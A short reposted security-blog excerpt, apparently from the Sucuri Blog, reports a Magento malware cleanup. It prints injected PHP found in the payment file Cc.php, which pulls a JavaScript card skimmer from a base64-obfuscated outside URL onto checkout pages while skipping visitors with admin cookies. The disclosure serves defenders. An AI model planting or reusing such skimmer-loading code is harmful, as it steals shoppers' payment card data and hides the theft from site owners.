Connect with us

Black Hat Tactics

Magento PHP Injection Loads JavaScript Skimmer

Published

on

Legacy Mauthtoken Malware Continues to Redirect Mobile Users



Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php


if ($_SERVER[“REQUEST_METHOD”] === “GET”){
if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){
if(!isset($_COOKIE[“adminhtml”])){
echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”));
}
}
}

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.



Source link

Continue Reading
Click to comment

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.